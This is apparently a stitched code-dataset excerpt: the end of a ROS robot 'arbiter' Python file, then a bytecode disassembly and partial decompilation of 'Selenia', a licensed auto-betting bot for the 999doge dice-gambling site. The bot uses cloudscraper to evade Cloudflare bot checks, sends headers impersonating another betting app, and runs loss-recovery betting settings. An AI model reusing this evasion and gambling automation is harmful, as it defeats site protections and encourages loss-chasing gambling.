        :type topics: dict[str, (str, (Any) -> transformers.Command)]
        :return:
        """
        for (topic, (msg_type, _)) in topics.iteritems():
            # The selftopic=topic part makes a copy of the topic variable, so it doesn't get changed before
            # the callback is called (late-binding closure pitfall).
            # https://stackoverflow.com/a/235764
            def callback(msg, selftopic=topic):
                self.handle_message(selftopic, msg)
            sub = rospy.Subscriber("/{}/{}".format(self.name, topic), msg_type, callback)
            self.subscribers[topic] = sub
            rospy.loginfo("Subscribed to /{}/{}".format(self.name, topic))

    def __str__(self):
        return 'Behavior[{}]'.format(self.name)

    # repr matches str so debug dumps of the behaviors dict are readable.
    __repr__ = __str__
if __name__ == '__main__':
    # Entry point: initialise the ROS node, then run the arbiter's main loop.
    rospy.init_node('arbiter')
    Arbiter().run()
| [
"eric@legoaces.org"
] | eric@legoaces.org |
6c3f3138f5a174c373d308b7a48067eb2479d0e0 | c208954de92470c0144fad2e07a92ed1822edd59 | /selenia/out_dis.py | 183b10d388d465444ad227f3c3a25273230c321e | [
"MIT"
] | permissive | rendy026/reverse-enginnering | 4217f3b723569fb792bac0f22a56a305199db1dc | f04cec0bf518a2617fc4fd7155f755fafc2af799 | refs/heads/master | 2023-01-07T15:49:15.791052 | 2020-10-13T09:22:02 | 2020-10-13T09:22:02 | 303,575,571 | 0 | 0 | MIT | 2020-10-13T09:41:59 | 2020-10-13T03:17:42 | Python | UTF-8 | Python | false | false | 67,675 | py | # FileNames : <EzzKun>
# Python Bytecode : 3.8.5
# Selector <module> In Line 1 file out.pyc
# Timestamp In Code : (2020-09-18 18:10:25)
# Method Name: <module>
# Filename: <EzzKun>
# Argument count: 0
# Kw-only arguments: 0
# Number of locals: 0
# Stack size: 10
# Flags: 0x00000040 (NOFREE)
# First Line: 1
# Constants:
# 0: 0
# 1: None
# 2: ('datetime',)
# 3: ('*',)
# 4: 'Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4 Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/79.0.3945.93 Mobile Safari/537.36'
# 5: 'application/x-www-form-urlencoded'
# 6: '/'
# 7: 'com.reland.relandicebot'
# 8: 'cross-site'
# 9: 'cors'
# 10: 'gzip, deflate'
# 11: 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'
# 12: 'lang=id'
# 13: ('user-agent', 'content-type', 'accept', 'x-requested-with', 'sec-fetch-site', 'sec-fetch-mode', 'accept-encoding', 'accept-language', 'cookie')
# 14: 'https://www.999doge.com/api/web.aspx'
# 15: '\x1b[0;34m'
# 16: '\x1b[0m'
# 17: '\x1b[1;33m'
# 18: '\x1b[1;32m'
# 19: '\x1b[1;31m'
# 20: '\x1b[0;36m'
# 21: '\x1b[1;35m'
# 22: '\x1b[5;37;42m'
# 23: '\x1b[5;37;41m'
# 24: '{:.8f}'
# 25: '{:0>1.0f}'
# 26: 'Username'
# 27: 'Password'
# 28: 'BaseTrade'
# 29: 'C1'
# 30: 'C2'
# 31: 'TradeCount_1'
# 32: 'TradeCount_2'
# 33: 200
# 34: 'Number Of Trade Out of Limit'
# 35: 'MultiplyOnWin'
# 36: '0'
# 37: 1
# 38: 'MultiplyOnLose'
# 39: 'MaxBaseTrade'
# 40: 'Toogle'
# 41: 'ON'
# 42: 'Max'
# 43: 100000000
# 44: 'ResetOnLoseMaxTrade'
# 45: 'StopOnLoseMaxTrade'
# 46: 'OFF'
# 47: 'ForceTC1AfterLose'
# 48: 'ChangeTCAfterLose'
# 49: 'TargetProfit'
# 50: 'ClientSeed'
# 51: 'RecoveryMultiplier'
# 52: 'RecoveryIncrease'
# 53: 'AddDelayTrade'
# 54: 'AddDelayTradeWin'
# 55: 'AddDelayTradeLose'
# 56: 'StopLoseBalance'
# 57: 'ContinueLastBase'
# 58: 'SmartRecovery'
# 59: -999999999999999999999999999
# 60: -100000000
# 61: 'doge'
# 62: 'Offline'
# 63: <code object withdraw at 0xa8bab020, file "<EzzKun>", line 86>
# 64: 'withdraw'
# 65: <code object harga_license at 0xa8a88f28, file "<EzzKun>", line 107>
# 66: 'harga_license'
# 67: <code object post at 0xa8a03020, file "<EzzKun>", line 121>
# 68: 'post'
# 69: <code object login at 0xa89fff90, file "<EzzKun>", line 125>
# 70: 'login'
# 71: <code object autobet at 0xa89fff28, file "<EzzKun>", line 171>
# 72: 'autobet'
# 73: <code object ainfo at 0xa89ffec0, file "<EzzKun>", line 347>
# 74: 'ainfo'
# 75: <code object verify at 0xa89ffe58, file "<EzzKun>", line 373>
# 76: 'verify'
# 77: <code object register at 0xa89ffc50, file "<EzzKun>", line 382>
# 78: 'register'
# 79: <code object check_license at 0xa89ff9e0, file "<EzzKun>", line 434>
# 80: 'check_license'
# 81: <code object check_license_platinum at 0xa89ff8a8, file "<EzzKun>", line 482>
# 82: 'check_license_platinum'
# 83: <code object gblnc at 0xa89ff840, file "<EzzKun>", line 522>
# 84: 'gblnc'
# 85: 'clear'
# 86: 'https://layscape.xyz/selenia/info.php'
# 87: 'Server Status Code ['
# 88: ']'
# 89: 'Alive'
# 90: 'versi'
# 91: 'Server Down Try Again or Check Latest Version Script'
# 92: 'ERROR CONNECTION TRY AGAIN'
# 93: 'a=GetBalance&s='
# 94: '&Currency=doge'
# 95: 'Balance'
# 96: '\x1b[1;31m====================================================\x1b[0m'
# 97: '\x1b[1;32m[+]\x1b[0m \x1b[0;36mDO WITH YOUR OWN RISK \x1b[0m \x1b[1;32m[+]\x1b[0m'
# 98: '\x1b[1;32m[+]\x1b[0m \x1b[1;33mCreator : Layscape\x1b[0m \x1b[1;32m[+]\x1b[0m'
# 99: '\x1b[1;32m[+]\x1b[0m \x1b[1;33mVersi Script V3.0\x1b[0m \x1b[1;32m[+]\x1b[0m'
# 100: '\x1b[1;32m[+]\x1b[0m \x1b[1;33mJoin Group Whatsapp For News and Update\x1b[0m \x1b[1;32m[+]\x1b[0m'
# 101: "Disclaimer : \nScript Not Working Don't Blame Creator :). \nRead/Watch How to Use As Well"
# 102: 'Info :'
# 103: 'notice5'
# 104: 'Information Script :'
# 105: 'Versi :'
# 106: 'Creator :'
# 107: 'created'
# 108: 'Youtube :'
# 109: 'youtube'
# 110: 'Script :'
# 111: 'script'
# 112: '3.0'
# 113: 'New Version'
# 114: 'New Version '
# 115: ' Release'
# 116: 'Please Update'
# 117: 'Type This Command:\n- git stash\n- git pull'
# 118: 'Notice :\n'
# 119: 'notice1'
# 120: 'notice2'
# 121: 'notice3'
# 122: 'notice4'
# 123: '- Attention to Your Connection'
# 124: 'Buy License Here : \nhttps://layscape.xyz/selenia/license'
# 125: ''
# 126: 'Online'
# 127: 'Re-Login for Refresh'
# 128: 'License Out of Date'
# 129: 'Buy New One'
# 130: 'Informasi Status Login :'
# 131: 'Account ID :'
# 132: 'Username :'
# 133: 'Doge Balance :'
# 134: 'Doge Deposit Wallet :'
# 135: 'License Type : '
# 136: 'Free License'
# 137: 'Expired Date : None'
# 138: 'SG Server Status :'
# 139: 'Max Balance : 150 DOGE'
# 140: 'Premium License'
# 141: 'Platinum License'
# 142: 'Date :'
# 143: '%Y-%m-%d'
# 144: 'Expired Date :'
# 145: 'Expired In :'
# 146: 'Days'
# 147: 'Max Balance : Unlimited'
# 148: 'Currency Available : DOGE'
# 149: 'Information Status Login :'
# 150: '\nPilih Menu :'
# 151: '1. Login Premium License'
# 152: '2. Login For Free'
# 153: '3. Login Platinum License'
# 154: '4. Register Account SELENIA'
# 155: '5. Price List License'
# 156: '0. Keluar'
# 157: '6. Start Trade'
# 158: '7. Withdraw'
# 159: '8. Account Information'
# 160: '==>'
# 161: '1'
# 162: '2'
# 163: '3'
# 164: '4'
# 165: '6'
# 166: '5'
# 167: '7'
# 168: '8'
# 169: 'NO MENU SELECTED'
# 170: (0,)
# Names:
# 0: cloudscraper
# 1: sys
# 2: os
# 3: time
# 4: random
# 5: requests
# 6: datetime
# 7: config
# 8: headers
# 9: create_scraper
# 10: scr
# 11: url
# 12: birutua
# 13: putih
# 14: kuning
# 15: hijau
# 16: merah
# 17: biru
# 18: ungu
# 19: bghijau_white
# 20: bgmerah_black
# 21: format
# 22: num_format
# 23: num_PayIn
# 24: account
# 25: Username
# 26: Password
# 27: float
# 28: tradeset
# 29: BaseTrade
# 30: C1
# 31: C2
# 32: int
# 33: TC1
# 34: TC2
# 35: print
# 36: exit
# 37: str
# 38: IncreaseOnWinPercent
# 39: ResetOnWin
# 40: IncreaseOnLosePercent
# 41: ResetOnLose
# 42: MaxBase
# 43: MaxBaseTrade
# 44: ResetOnLoseMaxTrade
# 45: StopOnLoseMaxTrade
# 46: tools
# 47: ForceTC1AfterLose
# 48: ChangeTCAfterLose
# 49: TargetProfit
# 50: ClientSeed
# 51: RecoveryMultiplier
# 52: RecoveryIncrease
# 53: AddDelayTrade
# 54: AddDelayTradeWin
# 55: AddDelayTradeLose
# 56: StopLoseBalance
# 57: ContinueLastBase
# 58: SmartRecovery
# 59: Currency
# 60: statslogin
# 61: limit
# 62: withdraw
# 63: harga_license
# 64: post
# 65: login
# 66: autobet
# 67: ainfo
# 68: verify
# 69: register
# 70: check_license
# 71: check_license_platinum
# 72: gblnc
# 73: system
# 74: get
# 75: srv
# 76: status_code
# 77: status
# 78: json
# 79: info
# 80: version
# 81: Exception
# 82: e
# 83: ses
# 84: getbalance
# 85: req
# 86: dogebalance
# 87: sleep
# 88: Expired
# 89: accid
# 90: dogewallet
# 91: logintype
# 92: statssrv
# 93: now
# 94: mydatetime
# 95: strftime
# 96: userdate
# 97: input
# 98: smenu
1 0 LOAD_CONST 0 (0)
2 LOAD_CONST 1 (None)
4 IMPORT_NAME 0 (cloudscraper)
6 STORE_NAME 0 (cloudscraper)
8 LOAD_CONST 0 (0)
10 LOAD_CONST 1 (None)
12 IMPORT_NAME 1 (sys)
14 STORE_NAME 1 (sys)
16 LOAD_CONST 0 (0)
18 LOAD_CONST 1 (None)
20 IMPORT_NAME 2 (os)
22 STORE_NAME 2 (os)
24 LOAD_CONST 0 (0)
26 LOAD_CONST 1 (None)
28 IMPORT_NAME 3 (time)
30 STORE_NAME 3 (time)
32 LOAD_CONST 0 (0)
34 LOAD_CONST 1 (None)
36 IMPORT_NAME 4 (random)
38 STORE_NAME 4 (random)
40 LOAD_CONST 0 (0)
42 LOAD_CONST 1 (None)
44 IMPORT_NAME 5 (requests)
46 STORE_NAME 5 (requests)
2 48 LOAD_CONST 0 (0)
50 LOAD_CONST 2 (('datetime',))
52 IMPORT_NAME 6 (datetime)
54 IMPORT_FROM 6 (datetime)
56 STORE_NAME 6 (datetime)
58 POP_TOP
3 60 LOAD_CONST 0 (0)
62 LOAD_CONST 3 (('*',))
64 IMPORT_NAME 7 (config)
66 IMPORT_STAR
5 68 LOAD_CONST 4 ('Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4 Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/79.0.3945.93 Mobile Safari/537.36')
6 70 LOAD_CONST 5 ('application/x-www-form-urlencoded')
7 72 LOAD_CONST 6 ('/')
8 74 LOAD_CONST 7 ('com.reland.relandicebot')
9 76 LOAD_CONST 8 ('cross-site')
10 78 LOAD_CONST 9 ('cors')
11 80 LOAD_CONST 10 ('gzip, deflate')
12 82 LOAD_CONST 11 ('id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7')
13 84 LOAD_CONST 12 ('lang=id')
4 86 LOAD_CONST 13 (('user-agent', 'content-type', 'accept', 'x-requested-with', 'sec-fetch-site', 'sec-fetch-mode', 'accept-encoding', 'accept-language', 'cookie'))
88 BUILD_CONST_KEY_MAP 9
90 STORE_NAME 8 (headers)
15 92 LOAD_NAME 0 (cloudscraper)
94 LOAD_METHOD 9 (create_scraper)
96 CALL_METHOD 0
98 STORE_NAME 10 (scr)
16 100 LOAD_CONST 14 ('https://www.999doge.com/api/web.aspx')
102 STORE_NAME 11 (url)
17 104 LOAD_CONST 15 ('\x1b[0;34m')
106 STORE_NAME 12 (birutua)
18 108 LOAD_CONST 16 ('\x1b[0m')
110 STORE_NAME 13 (putih)
19 112 LOAD_CONST 17 ('\x1b[1;33m')
114 STORE_NAME 14 (kuning)
20 116 LOAD_CONST 18 ('\x1b[1;32m')
118 STORE_NAME 15 (hijau)
21 120 LOAD_CONST 19 ('\x1b[1;31m')
122 STORE_NAME 16 (merah)
22 124 LOAD_CONST 20 ('\x1b[0;36m')
126 STORE_NAME 17 (biru)
23 128 LOAD_CONST 21 ('\x1b[1;35m')
130 STORE_NAME 18 (ungu)
24 132 LOAD_CONST 22 ('\x1b[5;37;42m')
134 STORE_NAME 19 (bghijau_white)
25 136 LOAD_CONST 23 ('\x1b[5;37;41m')
138 STORE_NAME 20 (bgmerah_black)
26 140 LOAD_CONST 24 ('{:.8f}')
142 LOAD_ATTR 21 (format)
144 STORE_NAME 22 (num_format)
27 146 LOAD_CONST 25 ('{:0>1.0f}')
148 LOAD_ATTR 21 (format)
150 STORE_NAME 23 (num_PayIn)
28 152 LOAD_NAME 24 (account)
154 LOAD_CONST 26 ('Username')
156 BINARY_SUBSCR
158 STORE_NAME 25 (Username)
29 160 LOAD_NAME 24 (account)
162 LOAD_CONST 27 ('Password')
164 BINARY_SUBSCR
166 STORE_NAME 26 (Password)
31 168 LOAD_NAME 27 (float)
170 LOAD_NAME 28 (tradeset)
172 LOAD_CONST 28 ('BaseTrade')
174 BINARY_SUBSCR
176 CALL_FUNCTION 1
178 STORE_GLOBAL 29 (BaseTrade)
32 180 LOAD_NAME 27 (float)
182 LOAD_NAME 28 (tradeset)
184 LOAD_CONST 29 ('C1')
186 BINARY_SUBSCR
188 CALL_FUNCTION 1
190 STORE_NAME 30 (C1)
33 192 LOAD_NAME 27 (float)
194 LOAD_NAME 28 (tradeset)
196 LOAD_CONST 30 ('C2')
198 BINARY_SUBSCR
200 CALL_FUNCTION 1
202 STORE_NAME 31 (C2)
34 204 LOAD_NAME 32 (int)
206 LOAD_NAME 28 (tradeset)
208 LOAD_CONST 31 ('TradeCount_1')
210 BINARY_SUBSCR
212 CALL_FUNCTION 1
214 STORE_NAME 33 (TC1)
35 216 LOAD_NAME 32 (int)
218 LOAD_NAME 28 (tradeset)
220 LOAD_CONST 32 ('TradeCount_2')
222 BINARY_SUBSCR
224 CALL_FUNCTION 1
226 STORE_NAME 34 (TC2)
36 228 LOAD_NAME 33 (TC1)
230 LOAD_CONST 33 (200)
232 COMPARE_OP 4 (>)
234 POP_JUMP_IF_TRUE 246
236 LOAD_NAME 34 (TC2)
238 LOAD_CONST 33 (200)
240 COMPARE_OP 4 (>)
242 EXTENDED_ARG 1
244 POP_JUMP_IF_FALSE 262
37 >> 246 LOAD_NAME 35 (print)
248 LOAD_CONST 34 ('Number Of Trade Out of Limit')
250 CALL_FUNCTION 1
252 POP_TOP
38 254 LOAD_NAME 1 (sys)
256 LOAD_METHOD 36 (exit)
258 CALL_METHOD 0
260 POP_TOP
39 >> 262 LOAD_NAME 37 (str)
264 LOAD_NAME 28 (tradeset)
266 LOAD_CONST 35 ('MultiplyOnWin')
268 BINARY_SUBSCR
270 CALL_FUNCTION 1
272 STORE_NAME 38 (IncreaseOnWinPercent)
40 274 LOAD_NAME 38 (IncreaseOnWinPercent)
276 LOAD_CONST 36 ('0')
278 COMPARE_OP 2 (==)
280 EXTENDED_ARG 1
282 POP_JUMP_IF_FALSE 290
41 284 LOAD_CONST 37 (1)
286 STORE_NAME 39 (ResetOnWin)
288 JUMP_FORWARD 4 (to 294)
43 >> 290 LOAD_CONST 0 (0)
292 STORE_NAME 39 (ResetOnWin)
44 >> 294 LOAD_NAME 37 (str)
296 LOAD_NAME 28 (tradeset)
298 LOAD_CONST 38 ('MultiplyOnLose')
300 BINARY_SUBSCR
302 CALL_FUNCTION 1
304 STORE_NAME 40 (IncreaseOnLosePercent)
45 306 LOAD_NAME 40 (IncreaseOnLosePercent)
308 LOAD_CONST 36 ('0')
310 COMPARE_OP 2 (==)
312 EXTENDED_ARG 1
314 POP_JUMP_IF_FALSE 322
46 316 LOAD_CONST 37 (1)
318 STORE_NAME 41 (ResetOnLose)
320 JUMP_FORWARD 4 (to 326)
48 >> 322 LOAD_CONST 0 (0)
324 STORE_NAME 41 (ResetOnLose)
49 >> 326 LOAD_NAME 28 (tradeset)
328 LOAD_CONST 39 ('MaxBaseTrade')
330 BINARY_SUBSCR
332 LOAD_CONST 40 ('Toogle')
334 BINARY_SUBSCR
336 STORE_NAME 42 (MaxBase)
50 338 LOAD_NAME 42 (MaxBase)
340 LOAD_CONST 41 ('ON')
342 COMPARE_OP 2 (==)
344 EXTENDED_ARG 1
346 POP_JUMP_IF_FALSE 426
51 348 LOAD_NAME 27 (float)
350 LOAD_NAME 28 (tradeset)
352 LOAD_CONST 39 ('MaxBaseTrade')
354 BINARY_SUBSCR
356 LOAD_CONST 42 ('Max')
358 BINARY_SUBSCR
360 CALL_FUNCTION 1
362 LOAD_CONST 43 (100000000)
364 BINARY_MULTIPLY
366 STORE_GLOBAL 43 (MaxBaseTrade)
52 368 LOAD_NAME 28 (tradeset)
370 LOAD_CONST 39 ('MaxBaseTrade')
372 BINARY_SUBSCR
374 LOAD_CONST 44 ('ResetOnLoseMaxTrade')
376 BINARY_SUBSCR
378 LOAD_CONST 41 ('ON')
380 COMPARE_OP 2 (==)
382 EXTENDED_ARG 1
384 POP_JUMP_IF_FALSE 392
53 386 LOAD_CONST 37 (1)
388 STORE_NAME 44 (ResetOnLoseMaxTrade)
390 JUMP_FORWARD 4 (to 396)
55 >> 392 LOAD_CONST 0 (0)
394 STORE_NAME 44 (ResetOnLoseMaxTrade)
56 >> 396 LOAD_NAME 28 (tradeset)
398 LOAD_CONST 39 ('MaxBaseTrade')
400 BINARY_SUBSCR
402 LOAD_CONST 45 ('StopOnLoseMaxTrade')
404 BINARY_SUBSCR
406 LOAD_CONST 41 ('ON')
408 COMPARE_OP 2 (==)
410 EXTENDED_ARG 1
412 POP_JUMP_IF_FALSE 420
57 414 LOAD_CONST 37 (1)
416 STORE_NAME 45 (StopOnLoseMaxTrade)
418 JUMP_FORWARD 4 (to 424)
59 >> 420 LOAD_CONST 0 (0)
422 STORE_NAME 45 (StopOnLoseMaxTrade)
>> 424 JUMP_FORWARD 22 (to 448)
60 >> 426 LOAD_NAME 42 (MaxBase)
428 LOAD_CONST 46 ('OFF')
430 COMPARE_OP 2 (==)
432 EXTENDED_ARG 1
434 POP_JUMP_IF_FALSE 448
61 436 LOAD_CONST 0 (0)
438 STORE_GLOBAL 43 (MaxBaseTrade)
62 440 LOAD_CONST 0 (0)
442 STORE_NAME 44 (ResetOnLoseMaxTrade)
63 444 LOAD_CONST 0 (0)
446 STORE_NAME 45 (StopOnLoseMaxTrade)
66 >> 448 LOAD_NAME 46 (tools)
450 LOAD_CONST 47 ('ForceTC1AfterLose')
452 BINARY_SUBSCR
454 STORE_NAME 47 (ForceTC1AfterLose)
67 456 LOAD_NAME 46 (tools)
458 LOAD_CONST 48 ('ChangeTCAfterLose')
460 BINARY_SUBSCR
462 LOAD_CONST 40 ('Toogle')
464 BINARY_SUBSCR
466 STORE_NAME 48 (ChangeTCAfterLose)
68 468 LOAD_NAME 27 (float)
470 LOAD_NAME 46 (tools)
472 LOAD_CONST 49 ('TargetProfit')
474 BINARY_SUBSCR
476 CALL_FUNCTION 1
478 STORE_NAME 49 (TargetProfit)
69 480 LOAD_NAME 32 (int)
482 LOAD_NAME 28 (tradeset)
484 LOAD_CONST 50 ('ClientSeed')
486 BINARY_SUBSCR
488 CALL_FUNCTION 1
490 STORE_NAME 50 (ClientSeed)
70 492 LOAD_NAME 27 (float)
494 LOAD_NAME 46 (tools)
496 LOAD_CONST 51 ('RecoveryMultiplier')
498 BINARY_SUBSCR
500 CALL_FUNCTION 1
502 STORE_NAME 51 (RecoveryMultiplier)
71 504 LOAD_NAME 27 (float)
506 LOAD_NAME 46 (tools)
508 LOAD_CONST 52 ('RecoveryIncrease')
510 BINARY_SUBSCR
512 CALL_FUNCTION 1
514 STORE_NAME 52 (RecoveryIncrease)
72 516 LOAD_NAME 27 (float)
518 LOAD_NAME 46 (tools)
520 LOAD_CONST 53 ('AddDelayTrade')
522 BINARY_SUBSCR
524 CALL_FUNCTION 1
526 STORE_NAME 53 (AddDelayTrade)
73 528 LOAD_NAME 27 (float)
530 LOAD_NAME 46 (tools)
532 LOAD_CONST 54 ('AddDelayTradeWin')
534 BINARY_SUBSCR
536 CALL_FUNCTION 1
538 STORE_NAME 54 (AddDelayTradeWin)
74 540 LOAD_NAME 27 (float)
542 LOAD_NAME 46 (tools)
544 LOAD_CONST 55 ('AddDelayTradeLose')
546 BINARY_SUBSCR
548 CALL_FUNCTION 1
550 STORE_NAME 55 (AddDelayTradeLose)
75 552 LOAD_NAME 27 (float)
554 LOAD_NAME 46 (tools)
556 LOAD_CONST 56 ('StopLoseBalance')
558 BINARY_SUBSCR
560 CALL_FUNCTION 1
562 STORE_NAME 56 (StopLoseBalance)
76 564 LOAD_NAME 46 (tools)
566 LOAD_CONST 57 ('ContinueLastBase')
568 BINARY_SUBSCR
570 STORE_GLOBAL 57 (ContinueLastBase)
77 572 LOAD_NAME 46 (tools)
574 LOAD_CONST 58 ('SmartRecovery')
576 BINARY_SUBSCR
578 STORE_NAME 58 (SmartRecovery)
import cloudscraper, sys, os, time, random, requests
from datetime import datetime
from config import *
headers = {'user-agent':'Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4 Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/79.0.3945.93 Mobile Safari/537.36',
'content-type':'application/x-www-form-urlencoded',
'accept':'/',
'x-requested-with':'com.reland.relandicebot',
'sec-fetch-site':'cross-site',
'sec-fetch-mode':'cors',
'accept-encoding':'gzip, deflate',
'accept-language':'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7',
'cookie':'lang=id'}
scr = cloudscraper.create_scraper()
url = 'https://www.999doge.com/api/web.aspx'
birutua = '\x1b[0;34m'
putih = '\x1b[0m'
kuning = '\x1b[1;33m'
hijau = '\x1b[1;32m'
merah = '\x1b[1;31m'
biru = '\x1b[0;36m'
ungu = '\x1b[1;35m'
bghijau_white = '\x1b[5;37;42m'
bgmerah_black = '\x1b[5;37;41m'
num_format = '{:.8f}'.format
num_PayIn = '{:0>1.0f}'.format
Username = account['Username']
Password = account['Password']
BaseTrade = float(tradeset['BaseTrade'])
C1 = float(tradeset['C1'])
C2 = float(tradeset['C2'])
TC1 = int(tradeset['TradeCount_1'])
TC2 = int(tradeset['TradeCount_2'])
if TC1 > 200 or (TC2 > 200):
print('Number Of Trade Out of Limit')
sys.exit()
IncreaseOnWinPercent = str(tradeset['MultiplyOnWin'])
if IncreaseOnWinPercent == '0':
ResetOnWin = 1
else:
ResetOnWin = 0
IncreaseOnLosePercent = str(tradeset['MultiplyOnLose'])
if IncreaseOnLosePercent == '0':
ResetOnLose = 1
else:
ResetOnLose = 0
MaxBase = tradeset['MaxBaseTrade']['Toogle']
if MaxBase == 'ON':
MaxBaseTrade = float(tradeset['MaxBaseTrade']['Max']) * 100000000
if tradeset['MaxBaseTrade']['ResetOnLoseMaxTrade'] == 'ON':
ResetOnLoseMaxTrade = 1
else:
ResetOnLoseMaxTrade = 0
if tradeset['MaxBaseTrade']['StopOnLoseMaxTrade'] == 'ON':
StopOnLoseMaxTrade = 1
else:
StopOnLoseMaxTrade = 0
elif MaxBase == 'OFF':
MaxBaseTrade = 0
ResetOnLoseMaxTrade = 0
StopOnLoseMaxTrade = 0
ForceTC1AfterLose = tools['ForceTC1AfterLose']
ChangeTCAfterLose = tools['ChangeTCAfterLose']['Toogle']
TargetProfit = float(tools['TargetProfit'])
ClientSeed = int(tradeset['ClientSeed'])
RecoveryMultiplier = float(tools['RecoveryMultiplier'])
RecoveryIncrease = float(tools['RecoveryIncrease'])
AddDelayTrade = float(tools['AddDelayTrade'])
AddDelayTradeWin = float(tools['AddDelayTradeWin'])
AddDelayTradeLose = float(tools['AddDelayTradeLose'])
StopLoseBalance = float(tools['StopLoseBalance'])
ContinueLastBase = tools['ContinueLastBase']
SmartRecovery = tools['SmartRecovery']
78 580 LOAD_NAME 56 (StopLoseBalance)
582 LOAD_CONST 36 ('0')
584 COMPARE_OP 2 (==)
586 EXTENDED_ARG 2
588 POP_JUMP_IF_TRUE 600
590 LOAD_NAME 56 (StopLoseBalance)
592 LOAD_CONST 0 (0)
594 COMPARE_OP 2 (==)
596 EXTENDED_ARG 2
598 POP_JUMP_IF_FALSE 606
79 >> 600 LOAD_CONST 59 (-999999999999999999999999999)
602 STORE_NAME 56 (StopLoseBalance)
604 JUMP_FORWARD 28 (to 634)
80 >> 606 LOAD_NAME 56 (StopLoseBalance)
608 LOAD_CONST 36 ('0')
610 COMPARE_OP 3 (!=)
612 EXTENDED_ARG 2
614 POP_JUMP_IF_TRUE 626
616 LOAD_NAME 56 (StopLoseBalance)
618 LOAD_CONST 0 (0)
620 COMPARE_OP 3 (!=)
622 EXTENDED_ARG 2
624 POP_JUMP_IF_FALSE 634
81 >> 626 LOAD_NAME 56 (StopLoseBalance)
628 LOAD_CONST 60 (-100000000)
630 BINARY_MULTIPLY
632 STORE_NAME 56 (StopLoseBalance)
82 >> 634 LOAD_CONST 61 ('doge')
636 STORE_NAME 59 (Currency)
84 638 LOAD_CONST 62 ('Offline')
640 STORE_GLOBAL 60 (statslogin)
85 642 LOAD_CONST 0 (0)
644 STORE_NAME 61 (limit)
# --- skip function ---
86 646 LOAD_CONST 63 (<code object withdraw at 0xa8bab020, file "<EzzKun>", line 86>)
648 LOAD_CONST 64 ('withdraw')
650 MAKE_FUNCTION 0
652 STORE_NAME 62 (withdraw)
107 654 LOAD_CONST 65 (<code object harga_license at 0xa8a88f28, file "<EzzKun>", line 107>)
656 LOAD_CONST 66 ('harga_license')
658 MAKE_FUNCTION 0
660 STORE_NAME 63 (harga_license)
121 662 LOAD_CONST 67 (<code object post at 0xa8a03020, file "<EzzKun>", line 121>)
664 LOAD_CONST 68 ('post')
666 MAKE_FUNCTION 0
668 STORE_NAME 64 (post)
125 670 LOAD_CONST 69 (<code object login at 0xa89fff90, file "<EzzKun>", line 125>)
672 LOAD_CONST 70 ('login')
674 MAKE_FUNCTION 0
676 STORE_NAME 65 (login)
171 678 LOAD_CONST 170 ((0,))
680 LOAD_CONST 71 (<code object autobet at 0xa89fff28, file "<EzzKun>", line 171>)
682 LOAD_CONST 72 ('autobet')
684 MAKE_FUNCTION 1 (defaults)
686 STORE_NAME 66 (autobet)
347 688 LOAD_CONST 73 (<code object ainfo at 0xa89ffec0, file "<EzzKun>", line 347>)
690 LOAD_CONST 74 ('ainfo')
692 MAKE_FUNCTION 0
694 STORE_NAME 67 (ainfo)
373 696 LOAD_CONST 75 (<code object verify at 0xa89ffe58, file "<EzzKun>", line 373>)
698 LOAD_CONST 76 ('verify')
700 MAKE_FUNCTION 0
702 STORE_NAME 68 (verify)
382 704 LOAD_CONST 77 (<code object register at 0xa89ffc50, file "<EzzKun>", line 382>)
706 LOAD_CONST 78 ('register')
708 MAKE_FUNCTION 0
710 STORE_NAME 69 (register)
434 712 LOAD_CONST 79 (<code object check_license at 0xa89ff9e0, file "<EzzKun>", line 434>)
714 LOAD_CONST 80 ('check_license')
716 MAKE_FUNCTION 0
718 STORE_NAME 70 (check_license)
482 720 LOAD_CONST 81 (<code object check_license_platinum at 0xa89ff8a8, file "<EzzKun>", line 482>)
722 LOAD_CONST 82 ('check_license_platinum')
724 MAKE_FUNCTION 0
726 STORE_NAME 71 (check_license_platinum)
522 728 LOAD_CONST 83 (<code object gblnc at 0xa89ff840, file "<EzzKun>", line 522>)
730 LOAD_CONST 84 ('gblnc')
732 MAKE_FUNCTION 0
734 STORE_NAME 72 (gblnc)
# --- all functions are saved to files in the ``object`` dir ---
529 736 SETUP_FINALLY 86 (to 824)
530 738 LOAD_NAME 2 (os)
740 LOAD_METHOD 73 (system)
742 LOAD_CONST 85 ('clear')
744 CALL_METHOD 1
746 POP_TOP
531 748 LOAD_NAME 10 (scr)
750 LOAD_METHOD 74 (get)
752 LOAD_CONST 86 ('https://layscape.xyz/selenia/info.php')
754 CALL_METHOD 1
756 STORE_NAME 75 (srv)
532 758 LOAD_NAME 75 (srv)
760 LOAD_ATTR 76 (status_code)
762 STORE_NAME 77 (status)
533 764 LOAD_NAME 35 (print)
766 LOAD_CONST 87 ('Server Status Code [')
768 LOAD_NAME 77 (status)
770 LOAD_CONST 88 (']')
772 CALL_FUNCTION 3
774 POP_TOP
534 776 LOAD_NAME 77 (status)
778 LOAD_CONST 33 (200)
780 COMPARE_OP 2 (==)
782 EXTENDED_ARG 3
784 POP_JUMP_IF_FALSE 820
535 786 LOAD_NAME 35 (print)
788 LOAD_NAME 15 (hijau)
790 LOAD_CONST 89 ('Alive')
792 BINARY_ADD
794 LOAD_NAME 13 (putih)
796 BINARY_ADD
798 CALL_FUNCTION 1
800 POP_TOP
536 802 LOAD_NAME 75 (srv)
804 LOAD_METHOD 78 (json)
806 CALL_METHOD 0
808 STORE_NAME 79 (info)
537 810 LOAD_NAME 79 (info)
812 LOAD_CONST 90 ('versi')
814 BINARY_SUBSCR
816 STORE_NAME 80 (version)
818 JUMP_FORWARD 0 (to 820)
539 >> 820 POP_BLOCK
822 JUMP_FORWARD 86 (to 910)
540 >> 824 DUP_TOP
826 LOAD_NAME 81 (Exception)
828 COMPARE_OP 10 (exception match)
830 EXTENDED_ARG 3
832 POP_JUMP_IF_FALSE 908
834 POP_TOP
836 STORE_NAME 82 (e)
838 POP_TOP
840 SETUP_FINALLY 54 (to 896)
541 842 LOAD_NAME 35 (print)
844 LOAD_NAME 16 (merah)
